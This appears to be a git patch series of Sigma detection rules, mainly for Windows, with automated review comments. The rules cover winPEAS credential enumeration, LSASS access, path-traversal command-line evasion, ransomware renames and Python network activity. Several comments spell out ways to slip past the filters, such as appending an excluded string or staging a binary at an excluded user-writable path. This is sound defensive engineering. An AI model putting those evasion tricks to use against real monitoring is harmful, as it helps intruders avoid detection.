@@ -16,7 +16,7 @@ logsource: category: process_creation product: windows detection: - winpeas_basic: + selection_basic: Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' @@ -24,28 +24,17 @@ detection: - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - winpeas_option: - CommandLine|contains: - - 'systeminfo' # Search system information - - 'userinfo' # Search user information - - 'processinfo' # Search processes information + selection_pe: + OriginalFileName: 'winPEAS.exe' + selection_option: + - CommandLine|endswith: - 'serviceinfo' # Search services information - 'applicationsinfo' # Search installed applications information - - 'networkinfo' # Search network information - 'windowscreds' # Search windows credentials - 'browserinfo ' # Search browser information - - 'filesinfo ' # Search generic files that can contains credentials - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - - 'eventsinfo' # Display interesting events information - filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - condition: 1 of winpeas_* and not filter_sysinfo -fields: - - Image - - User - - CommandLine - - ParentCommandLine - - CurrentDirectory + - CommandLine|contains: '.exe browserinfo ' # Search browser information + condition: 1 of selection* falsepositives: - - Unlikely + - Other programs that use the same command line flags level: high From 83fbd7f258a315417f4418f0f07700cd4abcfa7c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 20 Sep 2022 17:45:13 +0200 Subject: [PATCH 71/96] Update proc_creation_win_winpeas_tool.yml --- .../windows/process_creation/proc_creation_win_winpeas_tool.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 0b34ea85c..917e8fdba 100644 
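Review bot: Under the new `CommandLine|endswith`, the entry `'browserinfo '` keeps a trailing space, so it can only match a command line that ends with a space after the option; the separately added `CommandLine|contains: '.exe browserinfo '` is what actually covers that option, leaving the `endswith` entry dead. Drop the trailing space (`- 'browserinfo'`) or remove the entry so the two do not diverge. The remaining bare option words under `endswith` (`serviceinfo`, `windowscreds`, …) match any process whose command line ends in that word, which at `level: high` is why the new `falsepositives` wording is appropriate; a brief comment on `selection_option` saying it is intentionally name-independent would help the next maintainer.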
--- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -25,7 +25,7 @@ detection: - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' selection_pe: - OriginalFileName: 'winPEAS.exe' + OriginalFileName: 'winPEAS.exe' selection_option: - CommandLine|endswith: - 'serviceinfo' # Search services information From ad6ddf5896d2032293e56d76a1e1821e9c6ae7b2 Mon Sep 17 00:00:00 2001 From: David Hazekamp Date: Tue, 20 Sep 2022 13:47:17 -0500 Subject: [PATCH 72/96] feat(backend): add support for linux.network_connection Also remove evaluatorId --- tools/sigma/backends/lacework.py | 104 ++++++++++++++++++------------- 1 file changed, 61 insertions(+), 43 deletions(-) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index f3c5eb870..df4e60f0c 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py @@ -33,10 +33,9 @@ from sigma.parser.modifiers.base import SigmaTypeModifier LACEWORK_CONFIG = yaml.load( textwrap.dedent(''' --- - version: 0.3 + version: 0.4 services: cloudtrail: - evaluatorId: Cloudtrail source: CloudTrailRawEvents fieldMap: - sigmaField: eventName @@ -67,8 +66,8 @@ LACEWORK_CONFIG = yaml.load( alertProfile: LW_CloudTrail_Alerts product.categories: linux.file_create: - evaluatorId: - source: LW_HE_FILES + sources: + - LW_HE_FILES conditions: # evaluated hourly and file create time within the last hour - and diff_minutes(FILE_CREATED_TIME, current_timestamp_sec()::timestamp) <= 60 
@@ -87,9 +86,40 @@ LACEWORK_CONFIG = yaml.load( - OWNER_USERNAME - FILE_CREATED_TIME alertProfile: LW_HE_FILES_DEFAULT_PROFILE.HE_File_NewViolation + linux.network_connection: + sources: + - LW_HA_CONNECTION_SUMMARY as HACM + - array_to_rows(ENDPOINT_DETAILS) as (EP_PA) + fieldMap: + - sigmaField: Image + laceworkField: EXE_PATH + matchType: exact + action: selfjoin + selfJoinFilter: HACM.SRC_ENTITY_TYPE = 'Process' AND (HACM.SRC_ENTITY_ID:mid::NUMBER, HACM.SRC_ENTITY_ID:pid_hash::NUMBER) IN { source { LW_HE_PROCESSES AS HEP } filter { EXE_PATH like '%/bin/bash' } return { HEP.MID, HEP.PID_HASH }} + - sigmaField: DestinationIp + laceworkField: EP_PA:dst_ip_addr + matchType: exact + - sigmaField: DestinationHostname + laceworkField: + matchType: exact + action: raise + returns: + - HACM.BATCH_END_TIME + - HACM.BATCH_START_TIME + - HACM.DST_ENTITY_ID + - HACM.DST_ENTITY_TYPE + - HACM.DST_IN_BYTES + - HACM.DST_OUT_BYTES + - HACM.ENDPOINT_DETAILS + - HACM.NUM_CONNS + - HACM.SRC_ENTITY_ID + - HACM.SRC_ENTITY_TYPE + - HACM.SRC_IN_BYTES + - HACM.SRC_OUT_BYTES + alertProfile: LW_HA_CONNECTION_SUMMARY_DEFAULT_PROFILE.HA_Connection_Violation linux.process_creation: - evaluatorId: - source: LW_HE_PROCESSES + sources: + - LW_HE_PROCESSES conditions: # evaluated hourly and file create time within the last hour - and diff_minutes(PROCESS_START_TIME, current_timestamp_sec()::timestamp) <= 60 
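Review bot: The `selfJoinFilter` for `sigmaField: Image` hard-codes `EXE_PATH like '%/bin/bash'`; nothing in this hunk shows the backend substituting the rule's own `Image` value into that string, so if it does not, every `linux.network_connection` rule that maps `Image` is silently pinned to bash regardless of what the Sigma rule says. Either template the value (a placeholder the backend fills from the rule) or comment the line to state that it is intentionally fixed. The empty `laceworkField:` for `DestinationHostname` together with `action: raise` also deserves a one-line comment saying the field is unsupported and rules using it are rejected — presumably what `raise` means here.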
@@ -489,22 +519,18 @@ class LaceworkQuery: self.logsource_config = self.get_logsource_config( config, self.logsource_type, self.logsource_name) - # 3. Get Evaluator ID - self.evaluator_id = self.get_evaluator_id( - self.logsource_name, self.logsource_config) - - # 4. Get Query ID + # 3. Get Query ID self.title, self.query_id = self.get_query_id(rule) - # 5. Get Query Source - self.query_source = self.get_query_source( + # 4. Get Query Source + self.query_sources = self.get_query_sources( self.logsource_name, self.logsource_config) - # 6. Get Query Returns + # 5. Get Query Returns self.returns = self.get_query_returns( self.logsource_name, self.logsource_config) - # 7. Get Query Text + # 6. Get Query Text self.query_text = self.get_query_text(backend, conditions) def get_query_text(self, backend, rule_conditions): @@ -539,8 +565,9 @@ class LaceworkQuery: ' {source}\n' ' }}' ) + return source_block_template.format( - source=self.query_source + source=',\n '.join(self.query_sources) ) def get_query_return_block(self): @@ -555,7 +582,6 @@ class LaceworkQuery: def __iter__(self): for key, attr in { - 'evaluatorId': 'evaluator_id', 'queryId': 'query_id', 'queryText': 'query_text' }.items(): @@ -623,12 +649,6 @@ class LaceworkQuery: return logsource_config - @staticmethod - def get_evaluator_id(logsource_name, logsource_config): - # 3. validate service has an evaluatorId mapping - evaluator_id = safe_get(logsource_config, 'evaluatorId', str) - return evaluator_id if evaluator_id else None - @staticmethod def get_query_id(rule): title = safe_get(rule, 'title', str) or 'Unknown' 
@@ -638,15 +658,18 @@ class LaceworkQuery:
return title, query_id
@staticmethod
- def get_query_source(logsource_name, logsource_config):
+ def get_query_sources(logsource_name, logsource_config) -> list[str]:
# 4. validate service has a source mapping
source = safe_get(logsource_config, 'source', str)
+ sources = safe_get(logsource_config, 'sources', list)
- if not source:
- raise BackendError(
- f'Lacework backend could not determine source for logsource {logsource_name}')
+ if sources:
+ return sources
+ elif source:
+ return [source]
- return source
+ raise BackendError(
+ f'Lacework backend could not determine source for logsource {logsource_name}')
@staticmethod
def get_query_returns(logsource_name, logsource_config):
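Review bot: `get_query_sources` returns `sources` unchecked when the config supplies a list, but the caller joins it with `',\n '.join(self.query_sources)` (second hunk of this commit, on the previous page line), so a list containing a non-string entry fails there with a TypeError instead of the backend's own error. A guard such as `if sources and all(isinstance(s, str) for s in sources):` keeps the failure inside this function with the existing `BackendError`. The `-> list[str]` annotation requires Python 3.9+, which is fine only if the backend already declares that minimum.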
@@ -703,42 +726,37 @@ class LaceworkPolicy: self.logsource_config = LaceworkQuery.get_logsource_config( config, self.logsource_type, self.logsource_name) - # 3. Get Evaluator Id - self.evaluator_id = LaceworkQuery.get_evaluator_id( - self.logsource_name, self.logsource_config) - - # 4. Get Title - # 5. Get Query ID + # 3. Get Title + # 4. Get Query ID self.title, self.query_id = LaceworkQuery.get_query_id(rule) - # 6. Get Enabled + # 5. Get Enabled self.enabled = False - # 7. Get Policy Type + # 6. Get Policy Type self.policy_type = 'Violation' - # 8. Get Alert Enabled + # 7. Get Alert Enabled self.alert_enabled = False - # 9. Get Alert Profile + # 8. Get Alert Profile self.alert_profile = self.get_alert_profile( self.logsource_name, self.logsource_config) - # 10. Get Limit + # 9. Get Limit self.limit = 1000 - # 11. Get Severity + # 10. Get Severity self.severity = safe_get(rule, 'level', str) or 'medium' - # 12. Get Description + # 11. Get Description self.description = safe_get(rule, 'description', str) - # 13. Get Remediation + # 12. Get Remediation self.remediation = 'Remediation steps are not represented in Sigma rule specification' def __iter__(self): for key, attr in { - 'evaluatorId': 'evaluator_id', 'title': 'title', 'enabled': 'enabled', 'policyType': 'policy_type', From fda2ca4308d826ec7ee20df3b41e2cdf37330ab2 Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 17:20:19 -0700 Subject: [PATCH 73/96] Update proc_creation_win_commandline_path_traversal_evasion.yml Fix FP with Citrix launcher --- .../proc_creation_win_commandline_path_traversal_evasion.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index 0c13c80cc..e63542221 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml 
+++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -24,8 +24,10 @@ detection: selection2: CommandLine|contains: '.exe\..\' filter: - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' + - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' + - CommandLine|contains: '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive + - Citrix level: high From 411d79017eb8060b380bc977ccb43f61012cd112 Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 21:33:16 -0700 Subject: [PATCH 74/96] Update proc_creation_win_commandline_path_traversal_evasion.yml Changed to simpler CommandLine|contains and updated modified date. --- ...roc_creation_win_commandline_path_traversal_evasion.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index e63542221..c0d988789 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -3,7 +3,7 @@ status: experimental id: 1327381e-6ab0-4f38-b583-4c1b8346a56b author: Christian Burkard date: 2021/10/26 -modified: 2022/02/02 +modified: 2022/09/20 description: Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal references: - https://twitter.com/hexacorn/status/1448037865435320323 
@@ -24,8 +24,9 @@ detection: selection2: CommandLine|contains: '.exe\..\' filter: - - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' - - CommandLine|contains: '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' + CommandLine|contains: + - '\Google\Drive\googledrivesync.exe\..\' + - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive From 5fbebce70351d6bd68249d839d534cdb9f7d2b4e Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 21:45:45 -0700 Subject: [PATCH 75/96] Update proc_creation_win_commandline_path_traversal_evasion.yml Removed extra space after the hyphen --- .../proc_creation_win_commandline_path_traversal_evasion.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index c0d988789..d5c4a6811 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -25,8 +25,8 @@ detection: CommandLine|contains: '.exe\..\' filter: CommandLine|contains: - - '\Google\Drive\googledrivesync.exe\..\' - - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' + - '\Google\Drive\googledrivesync.exe\..\' + - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive From 59530f49d47fde2b8b9c89c86f94811c8c040bfc Mon Sep 17 00:00:00 2001 
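Review bot: The Citrix exclusion folded into `filter` keys on `CommandLine|contains` alone, so any process whose command line merely contains `\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\` is excluded — an attacker can append that string as a throw-away argument to a `cmd.exe\..\..\..\Windows\System32\cmd.exe` invocation and bypass a `level: high` rule. The pre-existing Google Drive entry has the same weakness, but the hunk doubles the evasion surface without noting it. If the FP events show the launcher itself as the executing image, anchor each exclusion on it in its own map, e.g. `filter_citrix:` with `Image|endswith: '\Citrix.Authentication.VirtualSmartcard.Launcher.exe'` next to the existing CommandLine pattern (and the analogous `Image|endswith: '\googledrivesync.exe'` for Google Drive), with `condition: 1 of selection* and not 1 of filter_*`.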
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:53:39 +0200 Subject: [PATCH 76/96] Fix more FP in testing --- ...win_sysinternals_sdelete_file_deletion.yml | 30 ++++++---- .../file_event_win_susp_desktop_ini.yml | 35 ++++++----- .../file_rename_win_ransomware.yml | 11 ++-- .../image_load_side_load_antivirus.yml | 4 +- ...oad_side_load_from_non_system_location.yml | 3 +- .../image_load_susp_python_image_load.yml | 37 ++++++------ .../net_connection_win_python.yml | 21 ++++++- ...ion_win_susp_outbound_smtp_connections.yml | 7 ++- ...ccess_win_direct_syscall_ntopenprocess.yml | 6 ++ ...proc_access_win_rare_proc_access_lsass.yml | 7 ++- ...win_susp_proc_access_lsass_susp_source.yml | 9 +-- ...access_win_shellcode_inject_msf_empire.yml | 32 +++++++++- ...proc_creation_win_expand_cabinet_files.yml | 6 +- .../proc_creation_win_mstsc.yml | 3 +- ...proc_creation_win_susp_codepage_lookup.yml | 3 +- ...ete_removal_com_hijacking_registry_key.yml | 59 ++++++++++--------- 16 files changed, 176 insertions(+), 97 deletions(-) diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index be3e39dc3..03798c09f 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml 
@@ -4,22 +4,26 @@ status: test description: A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html + - https://github.com/OTRF/detection-hackathon-apt29/issues/9 + - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html date: 2020/05/02 -modified: 2021/11/27 +modified: 2022/09/21 logsource: - product: windows - category: file_delete + product: windows + category: file_delete detection: - selection: - TargetFilename|endswith: - - '.AAA' - - '.ZZZ' - condition: selection + selection: + TargetFilename|endswith: + - '.AAA' + - '.ZZZ' + filter_wireshark: + # This event occurs when (un)installing wireshark + TargetFilename: 'C:\Program Files\Wireshark\radius\dictionary.alcatel-lucent.aaa' + condition: selection falsepositives: - - Legitime usage of SDelete + - Legitime usage of SDelete + - An FP may occure if the installation directory of wireshark is changed level: medium tags: - - attack.defense_evasion - - attack.t1070.004 + - attack.defense_evasion + - attack.t1070.004 diff --git a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml index 3dbda7a44..3ac6496fb 100755 --- a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml +++ b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml 
@@ -4,25 +4,28 @@ status: test description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) references: - - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ + - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ date: 2020/03/19 -modified: 2021/12/03 +modified: 2022/09/20 logsource: - product: windows - category: file_event + product: windows + category: file_event detection: - selection: - TargetFilename|endswith: '\desktop.ini' - filter: - Image|startswith: - - 'C:\Windows\' - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter + selection: + TargetFilename|endswith: '\desktop.ini' + filter_generic: + Image|startswith: + - 'C:\Windows\' + - 'C:\Program Files\' + - 'C:\Program Files (x86)\' + filter_jetbrains: + Image|endswith: '\AppData\Local\JetBrains\Toolbox\bin\7z.exe' + TargetFilename|contains: '\JetBrains\apps\' + condition: selection and not 1 of filter_* falsepositives: - - Operations performed through Windows SCCM or equivalent - - Read only access list authority + - Operations performed through Windows SCCM or equivalent + - Read only access list authority level: medium tags: - - attack.persistence - - attack.t1547.009 + - attack.persistence + - attack.t1547.009 diff --git a/rules/windows/file_rename/file_rename_win_ransomware.yml b/rules/windows/file_rename/file_rename_win_ransomware.yml index 72d05ff25..3926f3b6e 100644 --- a/rules/windows/file_rename/file_rename_win_ransomware.yml +++ b/rules/windows/file_rename/file_rename_win_ransomware.yml @@ -7,7 +7,7 @@ references: - https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/ author: frack113 date: 2022/07/16 -modified: 2022/08/31 +modified: 2022/09/20 tags: - attack.impact - attack.t1486 
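Review bot: `filter_jetbrains` excludes an image matched only by `Image|endswith: '\AppData\Local\JetBrains\Toolbox\bin\7z.exe'`, i.e. a per-user, user-writable location with no drive or user prefix, so an unprivileged attacker who stages a binary at any path ending in that string and writes `desktop.ini` under a folder containing `\JetBrains\apps\` is silently dropped from a persistence rule (`attack.t1547.009`). Until now every exclusion in this rule (`filter_generic`) trusted only `C:\Windows\` and `Program Files`, so this is the first one satisfiable without admin rights. If the FP must be suppressed, keep the filter but record the trade-off above it, e.g. `# NOTE: user-writable path; only the file-name tail is checked, so a staged 7z.exe evades this rule`, and bump `modified:` to the commit date (the hunk writes 2022/09/20 for a 2022/09/21 commit).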
@@ -26,7 +26,7 @@ detection: - '.jpeg' - '.png' - '.pdf' - TargetFilename|contains: + TargetFilename|contains: - '.lnk.' - '.rtf.' - '.pst.' @@ -36,7 +36,7 @@ detection: - '.jpeg.' - '.png.' - '.pdf.' - filter: + filter_generic: TargetFilename|endswith: - '.tmp' - '.bak' @@ -44,7 +44,10 @@ detection: - '.orig' - '.backup' - '.temp' - condition: selection and not filter + filter_anaconda: + TargetFilename|startswith: 'C:\ProgramData\Anaconda3\' + TargetFilename|endswith: '.c~' + condition: selection and not 1 of filter_* falsepositives: - Backup software level: medium diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml index fd929f098..f2198619d 100644 --- a/rules/windows/image_load/image_load_side_load_antivirus.yml +++ b/rules/windows/image_load/image_load_side_load_antivirus.yml @@ -42,5 +42,7 @@ detection: - 'C:\Program Files (x86)\McAfee\' condition: (selection_bitdefender and not filter_bitdefender) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) falsepositives: - - Unknown + - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. + - Dell SARemediation pulgin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. + - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file level: medium diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index de8fc8740..922ae270e 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml 
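Review bot: In `image_load_side_load_antivirus.yml` the new `falsepositives` entries name concrete folders that ship a `log.dll` (Dell `SARemediation\plugin`, Canon `MyPrinter`), yet the diffstat shows only this 3-line hunk for the file, so no filter is added and `modified:` is not bumped — the rule keeps firing on every Dell/Canon host and each operator has to hand-tune it. Either encode them as filters (presumably `ImageLoaded|startswith: 'C:\Program Files\Dell\SARemediation\plugin\'` and `'C:\Program Files\Canon\MyPrinter\'`, wired into the existing per-vendor condition — confirm against the field names above the hunk) or state in the entry that they are deliberately left unfiltered. The entry also has a typo, `pulgin` → `plugin`, and `if a lot FPs are caused` → `if they cause many FPs`.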
@@ -416,8 +416,7 @@ detection: - 'C:\Windows\SysWOW64\' - 'C:\Windows\WinSxS\' - 'C:\Windows\SoftwareDistribution\' - filter_systemp: - ImageLoaded|startswith: 'C:\Windows\SystemTemp\' + - 'C:\Windows\SystemTemp\' filter_appvpolicy: ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe diff --git a/rules/windows/image_load/image_load_susp_python_image_load.yml b/rules/windows/image_load/image_load_susp_python_image_load.yml index 79b4ceff8..8ddb710a6 100644 --- a/rules/windows/image_load/image_load_susp_python_image_load.yml +++ b/rules/windows/image_load/image_load_susp_python_image_load.yml @@ -6,26 +6,27 @@ date: 2020/05/03 modified: 2021/12/05 author: Patrick St. John, OTR (Open Threat Research) tags: - - attack.defense_evasion - - attack.t1027.002 + - attack.defense_evasion + - attack.t1027.002 references: - - https://www.py2exe.org/ - - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ + - https://www.py2exe.org/ + - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ logsource: - product: windows - category: image_load + product: windows + category: image_load detection: - selection: - Description: 'Python Core' - filter: - - Image|contains: - - 'Python' # FPs with python38.dll, python.exe etc. - - Image|startswith: - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter + selection: + Description: 'Python Core' + filter: + - Image|contains: + - 'Python' # FPs with python38.dll, python.exe etc. + - Image|startswith: + - 'C:\Program Files\' + - 'C:\Program Files (x86)\' + condition: selection and not filter fields: - - Description + - Description falsepositives: - - Legit Py2Exe Binaries -level: medium \ No newline at end of file + - Legit Py2Exe Binaries + - Known false positive caused with anaconda installation/update +level: medium 
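Review bot: `modified: 2021/12/05` in `image_load_susp_python_image_load.yml` is carried over unchanged although the hunk edits the rule (new `falsepositives` entry, full re-indent), while every other rule in this commit bumps the date to 2022/09/2x; set `modified: 2022/09/21`. The 2→4 space re-indent turns a one-line change into a 37-line hunk and hides the functional edit — repo-wide re-indents are easier to review as their own commit. The `Image|contains: 'Python'` exclusion the hunk carries over is also very broad: any image whose full path contains that substring (e.g. a dropper staged in `C:\Users\x\python_tools\`) bypasses the rule, so anchoring on install roots such as `\Python3` / `\AppData\Local\Programs\Python\` / `\Anaconda3\` would be tighter and would also cover the new Anaconda FP without widening further.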
diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml index 5e0ec8245..bc3737dcb 100644 --- a/rules/windows/network_connection/net_connection_win_python.yml +++ b/rules/windows/network_connection/net_connection_win_python.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python - https://pypi.org/project/scapy/ date: 2021/12/10 -modified: 2022/08/12 +modified: 2022/09/20 logsource: category: network_connection product: windows @@ -15,7 +15,24 @@ detection: selection: Initiated: 'true' Image|contains: python - condition: selection + filter_conda: + # Related to anaconda updates. Command example: "conda update conda" + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage + ParentImage: C:\ProgramData\Anaconda3\Scripts\conda.exe + CommandLine|contains|all: + - 'C:\ProgramData\Anaconda3\Scripts\conda-script.py' + - 'update' + filter_conda_jupyter_notebook: + # Related to anaconda opening an instance of Jupyter Notebook + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage + ParentImage: C:\ProgramData\Anaconda3\python.exe + CommandLine|contains|all: + - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' + filter_local_communication: + # This coumd be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances + DestinationIp: 127.0.0.1 + SourceIp: 127.0.0.1 + condition: selection and not 1 of filter_* falsepositives: - Legitimate python script level: medium 
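Review bot: `filter_local_communication` suppresses only IPv4 loopback, so a Python process connecting to `::1` (which local Jupyter/proxy tooling may use on dual-stack hosts) still fires while `127.0.0.1` is silenced — inconsistent for the same intent. If loopback is to be excluded, list both, quoting the IPv6 literal because a bare `::1` starts with a YAML indicator: `DestinationIp: ['127.0.0.1', '::1']` and `SourceIp: ['127.0.0.1', '::1']`. `filter_conda_jupyter_notebook` uses `|contains|all` over a single value, which is just `|contains`; drop the `|all` or add the second marker you meant to require. The comment already concedes that this filter also hides Python-based SOCKS/port-forward endpoints bound to loopback, so I would keep that warning and consider shipping the filter commented out rather than on by default.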
diff --git a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml index 89a6e4bf1..7612f4a7b 100644 --- a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml +++ b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml @@ -9,7 +9,7 @@ references: - https://www.ietf.org/rfc/rfc2821.txt author: frack113 date: 2022/01/07 -modified: 2022/02/16 +modified: 2022/09/21 logsource: category: network_connection product: windows @@ -27,7 +27,10 @@ detection: - \outlook.exe filter_mailserver: Image|startswith: 'C:\Program Files\Microsoft\Exchange Server\' - condition: selection and not 1 of filter* + filter_outlook: + Image|startswith: 'C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_' + Image|endswith: '\HxTsr.exe' + condition: selection and not 1 of filter_* falsepositives: - Other SMTP tools level: medium diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index c0a3ec60a..30041efde 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml 
@@ -44,6 +44,12 @@ detection: falsepositive10: # MS Teams TargetImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' + falsepositives11: + TargetImage: 'C:\Windows\System32\backgroundTaskHost.exe' + SourceImage: 'C:\Windows\System32\backgroundTaskHost.exe' + falsepositives12: + TargetImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe' + SourceImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe' falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml index 26a7bf029..e9f723900 100644 --- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml +++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml @@ -7,7 +7,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule) author: Florian Roth date: 2022/03/13 -modified: 2022/09/18 +modified: 2022/09/20 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow 
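Review bot: The two new maps are named `falsepositives11` / `falsepositives12` (plural) while every existing one, including the adjacent `falsepositive10`, is singular; `1 of falsepositive*` still picks them up by prefix, but the inconsistency will confuse the next person adding `falsepositive13`. Rename them `falsepositive11:` and `falsepositive12:`, and give each a short inline label like the `# MS Teams` on the entry above (e.g. `# backgroundTaskHost self-access`, `# CCleaner Browser self-access`) so the reason for the exclusion survives. Both use exact absolute paths under `System32` / `Program Files (x86)`, which is the right anchoring for a direct-syscall rule.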
